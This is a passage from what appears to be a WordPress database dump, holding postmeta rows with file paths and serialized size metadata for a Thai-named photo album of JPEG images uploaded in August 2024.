ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123399;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:429891;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:696395;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22616;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2625,948,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16.jpg'),
(2626,948,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16.jpg\";s:8:\"filesize\";i:1370891;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22355;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:208156;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8736;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123480;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:426204;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:688705;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22595;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2627,949,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14.jpg'),
(2628,949,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14.jpg\";s:8:\"filesize\";i:1418837;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27273;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:233801;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10142;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142357;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:461617;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:730063;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28806;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2629,950,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12.jpg'),
(2630,950,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12.jpg\";s:8:\"filesize\";i:1518272;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23169;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231808;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8822;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134765;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:485262;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:784183;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24428;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2631,951,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13.jpg'),
(2632,951,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13.jpg\";s:8:\"filesize\";i:1553905;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24495;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:237030;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9000;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139177;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:489486;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:790626;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26132;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2633,952,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11.jpg'),
(2634,952,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11.jpg\";s:8:\"filesize\";i:1625825;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24673;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:250895;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9249;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144774;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:527889;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:853875;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26036;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2635,953,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10.jpg'),
(2636,953,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:105:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10.jpg\";s:8:\"filesize\";i:1198794;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21778;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180159;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8643;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108796;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:363174;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:107:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:587452;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22614;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2637,954,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9.jpg'),
(2638,954,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9.jpg\";s:8:\"filesize\";i:1115287;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22102;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:179277;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8813;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109664;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:354439;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:106:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:569014;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22573;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2639,955,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8.jpg'),
(2640,955,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8.jpg\";s:8:\"filesize\";i:579035;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24850;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:213265;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9468;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130451;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24912;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2641,956,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7.jpg'),
(2642,956,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7.jpg\";s:8:\"filesize\";i:665274;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26010;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:244321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9907;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148278;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26008;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2643,957,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6.jpg'),
(2644,957,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6.jpg\";s:8:\"filesize\";i:233437;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15048;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110858;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7261;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70950;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18779;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\